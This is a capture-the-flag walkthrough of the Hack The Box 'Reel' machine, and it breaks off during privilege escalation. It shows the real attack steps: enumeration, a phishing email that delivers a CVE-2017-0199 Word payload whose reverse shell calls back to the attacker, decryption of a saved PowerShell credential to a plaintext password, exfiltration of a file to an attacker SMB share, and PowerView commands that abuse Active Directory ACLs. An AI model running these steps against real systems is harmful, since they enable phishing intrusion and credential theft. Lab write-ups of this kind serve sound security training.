Reel is a medium-to-hard difficulty machine, which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.
Enumeration
Scope
IP Address: 10.10.10.77
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-07-12T12:48:32+01:00
| smb2-time:
| date: 2024-07-12T11:48:30
|_ start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s
* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls
10.10.10.77 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77
10.10.10.77
└── documents
├── AppLocker.docx
├── Windows Event Forwarding.docx
└── readme.txt
I downloaded these files but found nothing interesting inside them, except the email address of their creator: nico@megabank.com
RPC Enumeration
No data from rpcclient
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
I can't list the shares with CME or smbclient.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\:
SMB 10.10.10.77 445 REEL [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED
SMTP Enumeration
I always scan for open relay whenever I find an SMTP server, to check whether arbitrary emails that could be used for phishing can be sent through it.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
Initial Access
Shell as nico
I got a hint from the community that there is a CVE affecting Microsoft Office that allows RCE via phishing emails: CVE-2017-0199.
Since the SMTP server is an open relay and we can send arbitrary emails, we can craft a payload and deliver it through that server to get remote code execution.
There is a Metasploit module that can generate the malicious payload we want to send.
msf6 > search CVE-2017-0199
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.
Send an email to the user we found with the sendEmail command, attaching the document generated by Metasploit.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip
Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!
In Metasploit, I got a connection back as the nico user.
[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400
msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HTB\nico
Get the flag from the user's desktop.
meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt
4b1fa88985d787becfxxxxxxxxxxxxxx
User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx
Privilege Escalation
Shell as Tom
C:\Users\nico>tree /F
Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
cred.xml
user.txt
<snip>
It's a PowerShell credential file (a PSCredential serialized with Export-Clixml).
We can decrypt these credentials with the native Import-Clixml cmdlet, because the password is protected with DPAPI under the same user account we are currently running as.
C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"
Tom
1ts-mag1c!!!
We don't have any remote access to the machine other than SSH, so let's try to authenticate as tom over SSH.
tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
The other files are PowerView.ps1, which can be used to enumerate the AD environment and exploit misconfigurations, and SharpHound.exe, the BloodHound ingestor that collects information about the domain.
The most interesting file is acls.csv; I will copy it to my Kali machine after starting a local SMB server.
tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:
1 file(s) copied.
I opened the file and started to explore it manually, as I had tried to upload it to BloodHound but it failed for me.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv
Searching for the user tom, I found the following:
user tom has WriteOwner on user claire
user claire has WriteDacl on group backup_admins
This is a potential path: take over the claire account, authenticate as claire, then modify the ACL of the backup_admins group so we can add ourselves to it, since it looks like a high-privilege group.
PowerView.ps1, which already exists on the machine, can be used to execute this attack path.
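As an added audit example (not part of the original write-up or of SharpHound), the following Python script automates the manual search above: it loads an acls.csv, keeps only control rights held by principals outside the built-in admin groups, and chains them from tom to backup_admins so a defender can spot and remediate such paths. The sample rows are constructed, and the column names follow the legacy SharpHound CSV header as an assumption; check the real file's first line before relying on them.

```python
"""Audit a SharpHound acls.csv for control rights held by ordinary principals and
chain them into a path (constructed rows; the header layout is an assumption)."""
import csv
import io
from collections import defaultdict, deque
# Rights that let the holder take control of the target object.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                    "Owns", "AllExtendedRights", "ForceChangePassword"}
# Principals expected to hold such rights everywhere; not audit findings.
EXPECTED_HOLDERS = {"DOMAIN ADMINS", "ENTERPRISE ADMINS", "ADMINISTRATORS", "SYSTEM"}

SAMPLE_CSV = """\
ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
CLAIRE@HTB.LOCAL,USER,TOM@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,False
BACKUP_ADMINS@HTB.LOCAL,GROUP,CLAIRE@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,False
TOM@HTB.LOCAL,USER,TOM@HTB.LOCAL,USER,"ReadProperty, WriteProperty",,AccessAllowed,False
NICO@HTB.LOCAL,USER,DOMAIN ADMINS@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,True
"""

def load_edges(text):
    """Return {principal: {(target, right)}} for dangerous ACEs held by
    principals outside EXPECTED_HOLDERS; everything else is dropped."""
    edges = defaultdict(set)
    for row in csv.DictReader(io.StringIO(text)):
        principal = row["PrincipalName"].upper()
        if row["AccessControlType"] != "AccessAllowed":
            continue
        if principal.split("@")[0] in EXPECTED_HOLDERS:
            continue
        # A single ACE may list several rights, comma separated.
        for right in row["ActiveDirectoryRights"].replace(" ", "").split(","):
            if right in DANGEROUS_RIGHTS:
                edges[principal].add((row["ObjectName"].upper(), right))
    return edges

def find_path(edges, start, goal):
    """Breadth-first search over control edges from start to goal.
    Returns [(holder, right, target), ...] or None if no chain exists."""
    start, goal = start.upper(), goal.upper()
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for target, right in sorted(edges.get(node, ())):
            if target not in seen:
                seen.add(target)
                queue.append((target, path + [(node, right, target)]))
    return None

if __name__ == "__main__":
    e = load_edges(SAMPLE_CSV)
    for hop in find_path(e, "tom@htb.local", "backup_admins@htb.local") or []:
        print("%s --%s--> %s" % hop)
```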
Shell as Claire
Abuse WriteOwner to take ownership of the claire user, which lets us modify its access control list and grant ourselves the right to reset its password.
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword